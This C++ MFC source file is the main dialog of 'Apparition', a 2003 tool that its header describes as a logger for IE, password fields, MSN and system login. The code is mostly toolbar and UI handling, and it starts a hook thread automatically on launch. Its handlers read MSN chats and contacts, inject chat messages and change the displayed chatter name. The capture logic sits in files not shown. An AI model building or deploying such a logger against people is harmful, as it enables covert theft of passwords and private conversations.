

/************************************
  REVISION LOG ENTRY
  Revision By: Zhang, Zhefu
  E-mail: codetiger@hotmail.com
  Revised on 7/3/2003 
  Comment: This is part of the logger for IE, password edit, MSN, system login.
           You are free to use to use the code on the base of keeping this comment
 ************************************/

// ApparitionDlg.cpp : implementation file
//

#include "stdafx.h"
#include "Apparition.h"
#include "ApparitionDlg.h"
#include "nightmare.h"
#include "msnSpook.h"

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

#include "HyperLink.h"

// these constants represent the dimensions and number of buttons in
 // the default MFC-generated toolbar. If you need something different,
 // feel free to change them. For extra credit, you can load the
 // toolbar's existing image list at runtime and copy the parameters from
 // there.
static const int	kImageWidth (24);
static const int	kImageHeight (22);
static const int	kNumImages (18);

static const UINT	kToolBarBitDepth (ILC_COLOR24);

 // this color will be treated as transparent in the loaded bitmaps --
 // in other words, any pixel of this color will be set at runtime to
 // the user's button color. The Visual Studio toolbar editor defaults
 // to 192, 192, 192 (light gray).
static const RGBTRIPLE	kBackgroundColor = {219, 216,209};//{192, 192, 192};

namespace
{
	LONG GetRegKey(HKEY key, LPCTSTR subkey, LPTSTR retdata)
	{
		HKEY hkey;
		LONG retval = RegOpenKeyEx(key, subkey, 0, KEY_QUERY_VALUE, &hkey);

		if (retval == ERROR_SUCCESS) 
		{
			long datasize = MAX_PATH;
			TCHAR data[MAX_PATH];
			RegQueryValue(hkey, NULL, data, &datasize);
			lstrcpy(retdata,data);
			RegCloseKey(hkey);
		}

		return retval;
	}
}

/////////////////////////////////////////////////////////////////////////////
// CAboutDlg dialog used for App About

class CAboutDlg : public CDialog
{
public:
	CAboutDlg();

// Dialog Data
	//{{AFX_DATA(CAboutDlg)
	enum { IDD = IDD_ABOUTBOX };
	CHyperLink	m_link;
	//}}AFX_DATA

	// ClassWizard generated virtual function overrides
	//{{AFX_VIRTUAL(CAboutDlg)
	protected:
	virtual void DoDataExchange(CDataExchange* pDX);    // DDX/DDV support
	//}}AFX_VIRTUAL

// Implementation
protected:
	//{{AFX_MSG(CAboutDlg)
	virtual BOOL OnInitDialog();
	//}}AFX_MSG
	DECLARE_MESSAGE_MAP()
};

CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
	//{{AFX_DATA_INIT(CAboutDlg)
	//}}AFX_DATA_INIT
}

void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
	CDialog::DoDataExchange(pDX);
	//{{AFX_DATA_MAP(CAboutDlg)
	DDX_Control(pDX, IDC_LINK, m_link);
	//}}AFX_DATA_MAP
}

BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
	//{{AFX_MSG_MAP(CAboutDlg)
	//}}AFX_MSG_MAP
END_MESSAGE_MAP()

BOOL CAboutDlg::OnInitDialog() 
{
	m_link.SetURL(_T("http://www.codeguru.com/authorlist/page_Z.html"));
	m_link.ModifyLinkStyle(0, CHyperLink::StyleUseHover);
	CDialog::OnInitDialog();
	m_link.SetWindowText(_T("CodeGuru Author Link"));
	return TRUE;  // return TRUE unless you set the focus to a control
	              // EXCEPTION: OCX Property Pages should return FALSE
}

/////////////////////////////////////////////////////////////////////////////
// CApparitionDlg dialog

CApparitionDlg::CApparitionDlg(CWnd* pParent /*=NULL*/)
	: CDialog(CApparitionDlg::IDD, pParent)
{
	//{{AFX_DATA_INIT(CApparitionDlg)
		// NOTE: the ClassWizard will add member initialization here
	//}}AFX_DATA_INIT
	// Note that LoadIcon does not require a subsequent DestroyIcon in Win32
	m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
	m_rectToolbar.SetRect(0,0,0,0);

	m_pFontDefault = NULL;
	m_pFontMultiLang = NULL;

	m_bHooking = FALSE;
}

void CApparitionDlg::DoDataExchange(CDataExchange* pDX)
{
	CDialog::DoDataExchange(pDX);
	//{{AFX_DATA_MAP(CApparitionDlg)
	DDX_Control(pDX, IDC_EDIT, m_edit);
	//}}AFX_DATA_MAP
}

BEGIN_MESSAGE_MAP(CApparitionDlg, CDialog)
	//{{AFX_MSG_MAP(CApparitionDlg)
	ON_WM_SYSCOMMAND()
	ON_WM_PAINT()
	ON_WM_QUERYDRAGICON()
	ON_WM_SIZE()
	ON_NOTIFY_EX(TTN_NEEDTEXT, 0, OnToolTipText)
	ON_COMMAND(IDM_HOOK, OnHook)
	ON_COMMAND(IDM_IE, OnIE)
	ON_COMMAND(IDM_MSN_GET_ACTIVE_CHAT, OnMsnGetActiveChat)
	ON_COMMAND(IDM_MSN_SEND_CHAT, OnMsnSendChat)
	ON_COMMAND(IDM_MSN_SET_CHATTER, OnMsnSetChatter)
	ON_COMMAND(IDM_MSN_GET_CONTACT_LIST, OnMsnGetContactList)
    ON_COMMAND(IDM_MSN_TERMINATOR, OnMsnTerminator)
	ON_COMMAND(IDM_THANK, OnThank)
	ON_COMMAND(IDM_MAIL, OnMail)
	ON_COMMAND(IDM_HELP, OnHelp)
	ON_WM_CLOSE()
	ON_UPDATE_COMMAND_UI(IDM_HOOK, OnUpdateHook)
	ON_UPDATE_COMMAND_UI(IDM_EDIT, OnUpdateEdit)
	ON_UPDATE_COMMAND_UI(IDM_MSN, OnUpdateMSN)
	ON_UPDATE_COMMAND_UI(IDM_IE, OnUpdateIE)
	ON_UPDATE_COMMAND_UI(IDM_LOGIN, OnUpdateLogIn)
	ON_UPDATE_COMMAND_UI(IDM_MSN_GET_ACTIVE_CHAT, OnUpdateMsnGetActiveChat)
	ON_UPDATE_COMMAND_UI(IDM_MSN_SEND_CHAT, OnUpdateMsnSendChat)
	ON_UPDATE_COMMAND_UI(IDM_MSN_SET_CHATTER, OnUpdateMsnSetChatter)
	ON_UPDATE_COMMAND_UI(IDM_MSN_GET_CONTACT_LIST, OnUpdateMsnGetContactList)
    ON_UPDATE_COMMAND_UI(IDM_MSN_TERMINATOR, OnUpdateMsnTerminator)
	//}}AFX_MSG_MAP
END_MESSAGE_MAP()


/*
	ON_WM_SYSCOMMAND()
	ON_WM_PAINT()
	ON_WM_QUERYDRAGICON()
	ON_WM_SIZE()
	ON_NOTIFY_EX(TTN_NEEDTEXT, 0, OnToolTipText)
	ON_COMMAND(IDM_MSN_GET_ACTIVE_CHAT, OnMsnGetActiveChat)
	ON_COMMAND(IDM_MSN_SEND_CHAT, OnMsnSendChat)
	ON_COMMAND(IDM_MSN_SET_CHATTER, OnMsnSetChatter)
	ON_COMMAND(IDM_GET_CONTACT_LIST, OnMsnGetContactList)
	ON_COMMAND(IDM_THANK, OnThank)
	ON_COMMAND(IDM_MAIL, OnMail)
	ON_COMMAND(IDM_HELP, OnHelp)
	ON_WM_CLOSE()
  */
//ON_NOTIFY_EX_RANGE(TTN_NEEDTEXTA, IDM_HOOK, IDM_MSN_SET_CHATTER, OnToolTipText)
//ON_NOTIFY_EX_RANGE(TTN_NEEDTEXTW, IDM_HOOK, IDM_MSN_SET_CHATTER, OnToolTipText)

/////////////////////////////////////////////////////////////////////////////
// CApparitionDlg message handlers

// find every pixel of the default background color in the specified
 // bitmap and set each one to the user's button color.
static void	ReplaceBackgroundColor (CBitmap& ioBM)
{
	 // figure out how many pixels there are in the bitmap
	BITMAP		bmInfo;

	VERIFY (ioBM.GetBitmap (&bmInfo));
	
	 // add support for additional bit depths here if you choose
	VERIFY (bmInfo.bmBitsPixel == 24);
	VERIFY (bmInfo.bmWidthBytes == (bmInfo.bmWidth * 3));

	const UINT		numPixels (bmInfo.bmHeight * bmInfo.bmWidth);

	 // get a pointer to the pixels
    DIBSECTION  ds;

    VERIFY (ioBM.GetObject (sizeof (DIBSECTION), &ds) == sizeof (DIBSECTION));

	RGBTRIPLE*		pixels = reinterpret_cast<RGBTRIPLE*>(ds.dsBm.bmBits);
	VERIFY (pixels != NULL);

	 // get the user's preferred button color from the system
	const COLORREF		buttonColor (::GetSysColor (COLOR_BTNFACE));
	const RGBTRIPLE		userBackgroundColor = {
		GetBValue (buttonColor), GetGValue (buttonColor), GetRValue (buttonColor)};

	 // search through the pixels, substituting the user's button
	 // color for any pixel that has the magic background color
	for (UINT i = 0; i < numPixels; ++i)
	{
		if (pixels [i].rgbtBlue == kBackgroundColor.rgbtBlue &&
			pixels [i].rgbtGreen == kBackgroundColor.rgbtGreen &&
			pixels [i].rgbtRed == kBackgroundColor.rgbtRed)
		{
			pixels [i] = userBackgroundColor;
		}
	}
}

// create an image list for the specified BMP resource
static void	MakeToolbarImageList (UINT			inBitmapID,
								  CImageList&	outImageList)
{
	CBitmap		bm;

	 // if we use CBitmap::LoadBitmap() to load the bitmap, the colors
	 // will be reduced to the bit depth of the main screen and we won't
	 // be able to access the pixels directly. To avoid those problems,
	 // we'll load the bitmap as a DIBSection instead and attach the
	 // DIBSection to the CBitmap.
	VERIFY (bm.Attach (::LoadImage (::AfxFindResourceHandle(
		MAKEINTRESOURCE (inBitmapID), RT_BITMAP),
		MAKEINTRESOURCE (inBitmapID), IMAGE_BITMAP, 0, 0,
		(LR_DEFAULTSIZE | LR_CREATEDIBSECTION))));

	 // replace the specified color in the bitmap with the user's
	 // button color
	::ReplaceBackgroundColor (bm);

	 // create a 24 bit image list with the same dimensions and number
	 // of buttons as the toolbar
	VERIFY (outImageList.Create (
		kImageWidth, kImageHeight, kToolBarBitDepth, kNumImages, 0));

	 // attach the bitmap to the image list
	VERIFY (outImageList.Add (&bm, RGB (0, 0, 0)) != -1);
}

 // load the high color toolbar images and attach them to m_wndToolBar
void CApparitionDlg::AttachToolbarImages (UINT inNormalImageID,
									  UINT inDisabledImageID,
									  UINT inHotImageID)
{
	 // make high-color image lists for each of the bitmaps
	::MakeToolbarImageList (inNormalImageID, m_ToolbarImages);
	::MakeToolbarImageList (inDisabledImageID, m_ToolbarImagesDisabled);
	::MakeToolbarImageList (inHotImageID, m_ToolbarImagesHot);

	 // get the toolbar control associated with the CToolbar object
	CToolBarCtrl&	barCtrl = m_wndToolBar.GetToolBarCtrl();

	 // attach the image lists to the toolbar control
	barCtrl.SetImageList (&m_ToolbarImages);
	barCtrl.SetDisabledImageList (&m_ToolbarImagesDisabled);
	barCtrl.SetHotImageList (&m_ToolbarImagesHot);
}

BOOL CApparitionDlg::OnInitDialog()
{
	static BOOL bFirst = TRUE;
	if(!bFirst) return TRUE;
	bFirst = FALSE;

	CDialog::OnInitDialog();


	m_pFontDefault = m_edit.GetFont();
	LOGFONT _lf;
    m_pFontDefault->GetLogFont(&_lf);
    LOGFONT* lf = &_lf;
	//make it bold, a little larger
	lf->lfWeight = FW_BOLD;
	lf->lfHeight = (LONG)(int)(1.3 * lf->lfHeight);

	m_pFontMultiLang = new CFont;
	m_pFontMultiLang->CreateFont(lf->lfHeight, lf->lfWidth, lf->lfEscapement,
		lf->lfOrientation, lf->lfWeight, lf->lfItalic, lf->lfUnderline,
		lf->lfStrikeOut, lf->lfCharSet, lf->lfOutPrecision, lf->lfClipPrecision,
		lf->lfQuality, lf->lfPitchAndFamily, _T("SimSun"));
	//As far as I know, SimSun will work on at least Far East Area -- including 
	// Japanese, Simplified Chinese, Korean
	if(m_pFontMultiLang)
	{
		m_edit.SetFont(m_pFontMultiLang, TRUE);
	}
	m_edit.SetLimitText(1024 * 1024); //make it a little large anyway

	
	EnableToolTips(TRUE);
	// Add the ToolBar.
//	if (!m_wndToolBar.CreateEx(this, TBSTYLE_FLAT, WS_CHILD | WS_VISIBLE | CBRS_TOP
//		| CBRS_GRIPPER | CBRS_TOOLTIPS | CBRS_FLYBY | CBRS_SIZE_DYNAMIC) ||
//		!m_wndToolBar.LoadToolBar(IDR_MAINFRAME))
	if (!m_wndToolBar.CreateEx(this, TBSTYLE_FLAT, WS_CHILD | WS_VISIBLE | CBRS_TOP
		| CBRS_GRIPPER | CBRS_TOOLTIPS | CBRS_FLYBY | CBRS_SIZE_DYNAMIC))
	{
		TRACE0("Failed to create toolbar\n");
		return -1;      // fail to create
	}
	// attach the hicolor bitmaps to the toolbar
	AttachToolbarImages (IDB_HICOLOR_TOOLBAR_COOL,
						 IDB_HICOLOR_TOOLBAR_DISABLED,
						 IDB_HICOLOR_TOOLBAR_HOT);


	// TODO: Remove this if you don't want tool tips or a resizeable toolbar
	//m_wndToolBar.SetBarStyle(m_wndToolBar.GetBarStyle() |
	//	CBRS_TOOLTIPS | CBRS_FLYBY  );

    // We need to resize the dialog to make room for control bars.
	// First, figure out how big the control bars are.
	CRect rcClientStart;
	CRect rcClientNow;
	GetClientRect(rcClientStart);
	RepositionBars(AFX_IDW_CONTROLBAR_FIRST, AFX_IDW_CONTROLBAR_LAST, 
				   0, reposQuery, rcClientNow);
	
	// Now move all the controls so they are in the same relative
	// position within the remaining client area as they would be
	// with no control bars.
	CPoint ptOffset(rcClientNow.left - rcClientStart.left,
					rcClientNow.top - rcClientStart.top); 

/*	CRect  rcChild;					
	CWnd* pwndChild = GetWindow(GW_CHILD);
	while (pwndChild)
	{                               
		pwndChild->GetWindowRect(rcChild);
		ScreenToClient(rcChild);
		rcChild.OffsetRect(ptOffset);
		pwndChild->MoveWindow(rcChild, FALSE);
		pwndChild = pwndChild->GetNextWindow();
	}

	// Adjust the dialog window dimensions
	CRect rcWindow;
	GetWindowRect(rcWindow);
	rcWindow.right += rcClientStart.Width() - rcClientNow.Width();
	rcWindow.bottom += rcClientStart.Height() - rcClientNow.Height();
	MoveWindow(rcWindow, FALSE);
*/	
	// And position the control bars
	RepositionBars(AFX_IDW_CONTROLBAR_FIRST, AFX_IDW_CONTROLBAR_LAST, 0);
    m_wndToolBar.GetWindowRect(&m_rectToolbar);
	this->ScreenToClient(&m_rectToolbar);
	
	CRect rect;
	this->GetClientRect(&rect);
	rect.top = m_rectToolbar.bottom + 1;
	m_edit.MoveWindow(&rect);
	g_hEdit = m_edit.GetSafeHwnd();

	// Add "About..." menu item to system menu.

	// IDM_ABOUTBOX must be in the system command range.
	ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
	ASSERT(IDM_ABOUTBOX < 0xF000);

	CMenu* pSysMenu = GetSystemMenu(FALSE);
	if (pSysMenu != NULL)
	{
		CString strAboutMenu;
		strAboutMenu.LoadString(IDS_ABOUTBOX);
		if (!strAboutMenu.IsEmpty())
		{
			pSysMenu->AppendMenu(MF_SEPARATOR);
			pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
		}
	}

	// Set the icon for this dialog.  The framework does this automatically
	//  when the application's main window is not a dialog
	SetIcon(m_hIcon, TRUE);			// Set big icon
	SetIcon(m_hIcon, FALSE);		// Set small icon
	
	OnHook();
	
	return TRUE;  // return TRUE  unless you set the focus to a control
}

void CApparitionDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
	if ((nID & 0xFFF0) == IDM_ABOUTBOX)
	{
		CAboutDlg dlgAbout;
		dlgAbout.DoModal();
	}
	else
	{
		CDialog::OnSysCommand(nID, lParam);
	}
}

// If you add a minimize button to your dialog, you will need the code below
//  to draw the icon.  For MFC applications using the document/view model,
//  this is automatically done for you by the framework.

void CApparitionDlg::OnPaint() 
{
	if (IsIconic())
	{
		CPaintDC dc(this); // device context for painting

		SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0);

		// Center icon in client rectangle
		int cxIcon = GetSystemMetrics(SM_CXICON);
		int cyIcon = GetSystemMetrics(SM_CYICON);
		CRect rect;
		GetClientRect(&rect);
		int x = (rect.Width() - cxIcon + 1) / 2;
		int y = (rect.Height() - cyIcon + 1) / 2;

		// Draw the icon
		dc.DrawIcon(x, y, m_hIcon);
	}
	else
	{
		CDialog::OnPaint();
	}
}

// The system calls this to obtain the cursor to display while the user drags
//  the minimized window.
HCURSOR CApparitionDlg::OnQueryDragIcon()
{
	return (HCURSOR) m_hIcon;
}

void CApparitionDlg::OnSize(UINT nType, int cx, int cy) 
{
	CDialog::OnSize(nType, cx, cy);
	if(m_edit.GetSafeHwnd() && cx > 0 && cx < 3000 && !m_rectToolbar.IsRectEmpty())
	{
		m_edit.MoveWindow(0,m_rectToolbar.bottom + 1,cx, cy - m_rectToolbar.bottom - 3);
		m_edit.Invalidate();
		this->m_wndToolBar.MoveWindow(0, 0, cx - 2, m_rectToolbar.bottom);
	}
}

#include <Afxpriv.h>

BOOL CApparitionDlg::OnToolTipText(UINT uID, NMHDR* pNMHDR, LRESULT* pResult)
{
	ASSERT(pNMHDR->code == TTN_NEEDTEXTA || pNMHDR->code == TTN_NEEDTEXTW);

	// allow top level routing frame to handle the message
	if (GetRoutingFrame() != NULL)
		return FALSE;

	// need to handle both ANSI and UNICODE versions of the message
	TOOLTIPTEXTA* pTTTA = (TOOLTIPTEXTA*)pNMHDR;
	TOOLTIPTEXTW* pTTTW = (TOOLTIPTEXTW*)pNMHDR;
	//CString szFullText;
	TCHAR szFullText[256];

	CString cstTipText;
	CString cstStatusText;

	UINT nID = pNMHDR->idFrom;
	if (pNMHDR->code == TTN_NEEDTEXTA && (pTTTA->uFlags & TTF_IDISHWND) ||
		pNMHDR->code == TTN_NEEDTEXTW && (pTTTW->uFlags & TTF_IDISHWND))
	{
		// idFrom is actually the HWND of the tool
		nID = ((UINT)(WORD)::GetDlgCtrlID((HWND)nID));
	}

	if(nID == IDM_HOOK)
	{
		if(m_bHooking)
		{
			cstTipText = _T("Click to Unhook");
		}
		else
		{
			cstTipText = _T("Click to Hook");
		}
	}
	else if (nID != 0) // will be zero on a separator
	{
		//int nRet = LoadString(AfxGetInstanceHandle(), nID, szFullText.GetBuffer(1024), 1024);
        //szFullText.ReleaseBuffer(nRet);
		AfxLoadString(nID, szFullText);
		// this is the command id, not the button index
		AfxExtractSubString(cstTipText, szFullText, 1, '\n');
		AfxExtractSubString(cstStatusText, szFullText, 0, '\n');
	}


#ifndef UNICODE
	// Non-UNICODE Strings only are shown in the tooltip window...
	if (pNMHDR->code == TTN_NEEDTEXTA)
		lstrcpyn(pTTTA->szText, cstTipText,
            (sizeof(pTTTA->szText)/sizeof(pTTTA->szText[0])));
	else
		_mbstowcsz(pTTTW->szText, cstTipText,
            (sizeof(pTTTW->szText)/sizeof(pTTTW->szText[0])));
#else
	if(pNMHDR->code == TTN_NEEDTEXTA)
            _wcstombsz(pTTTA->szText,cstTipText,(sizeof(pTTTA->szText)/sizeof(pTTTA->szText[0])));
    else
            lstrcpyn(pTTTW->szText,cstTipText,(sizeof(pTTTW->szText)/sizeof(pTTTW->szText[0])));
#endif
	*pResult = 0;

	// bring the tooltip window above other popup windows
	::SetWindowPos(pNMHDR->hwndFrom, HWND_TOP, 0, 0, 0, 0,
		SWP_NOACTIVATE|SWP_NOSIZE|SWP_NOMOVE);


	return TRUE;    // message was handled
}

#include "ApparitionThread.h"
void CApparitionDlg::OnHook() 
{
	if(m_bHooking)
	{
		::ExitThread();
	}
	else
	{
		::InitThread(NULL);
	}
	m_bHooking = !m_bHooking;	
}

#include "IEListDlg.h"
void CApparitionDlg::OnIE() 
{
	CIEListDlg Dlg;
	Dlg.DoModal();
}

void CApparitionDlg::OnMsnGetActiveChat() 
{
	int nActiveChatTrack = GetActiveChat();
	if(nActiveChatTrack == -1) 
	{
		PopMsg(_T("no active chat"));
      	return;
	}
	::QueryChatContents(nActiveChatTrack);
	
}

void CApparitionDlg::OnMsnSendChat() 
{
	CString str = this->m_wndToolBar.GetText();
	int nActiveChatTrack = GetActiveChat();
	if(nActiveChatTrack == -1) 
	{
		PopMsg(_T("no active chat"));
		return;
	}
	SendChatText(str, TRUE, TRUE, nActiveChatTrack);
}

void CApparitionDlg::OnMsnSetChatter() 
{
	CString str = this->m_wndToolBar.GetText();
	int nActiveChatTrack = GetActiveChat();
	if(nActiveChatTrack == -1) 
	{
		PopMsg(_T("no active chat"));
		return;
	}
	SetChatterPersonName(str, nActiveChatTrack);	
}

void CApparitionDlg::OnMsnGetContactList() 
{
	//int nActiveChatTrack = GetActiveChat();
	//if(nActiveChatTrack == -1) return;
	QueryContactList();	
}

void CApparitionDlg::OnMsnTerminator() 
{
    int nActiveChat = ::GetActiveChat();
	HWND h = ::GetChatWindowHandle(nActiveChat);
	//Terminator(h);	
}

#include "ThankDlg.h"
void CApparitionDlg::OnThank() 
{
	CThankDlg dlg;
	dlg.DoModal();
}

void CApparitionDlg::OnMail() 
{
	HINSTANCE result = ShellExecute(NULL, _T("open"), 
		_T("mailto:codetiger@hotmail.com?subject=From Apparition 1.0 Comment"),NULL,NULL, SW_SHOWNORMAL);
}

void CApparitionDlg::OnHelp() 
{
	//m_wndToolBar.GetToolBarCtrl().
	CAboutDlg dlg;
	dlg.DoModal();
}

void CApparitionDlg::OnClose() 
{
	if(m_pFontMultiLang)
	{
		m_edit.SetFont(m_pFontDefault, TRUE);
	}
	m_pFontMultiLang->DeleteObject();
	delete m_pFontMultiLang;
	m_pFontMultiLang = m_pFontDefault = NULL;

    if(m_bHooking)
	{
		::ExitThread();
	}

	CDialog::OnClose();
}

//Q123158 Adding Control Bars to Foundation Classes Dialogs
//http://codeguru.earthweb.com/dialog/toolbars.shtml
BOOL CApparitionDlg::ContinueModal()
{
    m_wndToolBar.SendMessage( WM_IDLEUPDATECMDUI, WPARAM(TRUE), 0);
    return CDialog::ContinueModal();
}

void CApparitionDlg::OnUpdateHook(CCmdUI* pCmdUI)
{
	if(m_bHooking)
	{
		pCmdUI->SetCheck(TRUE);
	}
	else
	{
		pCmdUI->SetCheck(FALSE);
	}
}

void CApparitionDlg::OnUpdateEdit(CCmdUI* pCmdUI)
{
	pCmdUI->SetCheck(TRUE);
}

void CApparitionDlg::OnUpdateMSN(CCmdUI* pCmdUI)
{
	pCmdUI->SetCheck(TRUE);
	pCmdUI->Enable(TRUE);
	return;
	pCmdUI->Enable((::GetActiveChat() != (DWORD)-1 || ::GetMSNMainHWND() != NULL) ?
         TRUE : FALSE);
}

void CApparitionDlg::OnUpdateIE(CCmdUI* pCmdUI)
{
	//pCmdUI->SetCheck(TRUE);
	//pCmdUI->Enable(TRUE);
}

void CApparitionDlg::OnUpdateLogIn(CCmdUI* pCmdUI)
{
	pCmdUI->SetCheck(TRUE);
	pCmdUI->Enable(TRUE);
}

void CApparitionDlg::OnUpdateMsnGetActiveChat(CCmdUI* pCmdUI)
{
	//pCmdUI->Enable(TRUE);
	//return;
	pCmdUI->Enable((::GetActiveChat() != (DWORD)-1) ? TRUE : FALSE);
}

void CApparitionDlg::OnUpdateMsnSendChat(CCmdUI* pCmdUI)
{
	//pCmdUI->Enable(TRUE);
	//return;
	pCmdUI->Enable((::GetActiveChat() != (DWORD)-1) ? TRUE : FALSE);
}

void CApparitionDlg::OnUpdateMsnSetChatter(CCmdUI* pCmdUI)
{
	//pCmdUI->Enable(TRUE);
	//return;
	pCmdUI->Enable((::GetActiveChat() != (DWORD)-1) ? TRUE : FALSE);
}

void CApparitionDlg::OnUpdateMsnGetContactList(CCmdUI* pCmdUI)
{
	//pCmdUI->Enable(TRUE);
	//return;
	pCmdUI->Enable((::GetMSNMainHWND() != NULL) ? TRUE : FALSE);
}

void CApparitionDlg::OnUpdateMsnTerminator(CCmdUI* pCmdUI)
{
	//pCmdUI->Enable(TRUE);
	//return;
	pCmdUI->Enable((::GetActiveChat() != (DWORD)-1) ? TRUE : FALSE);
}
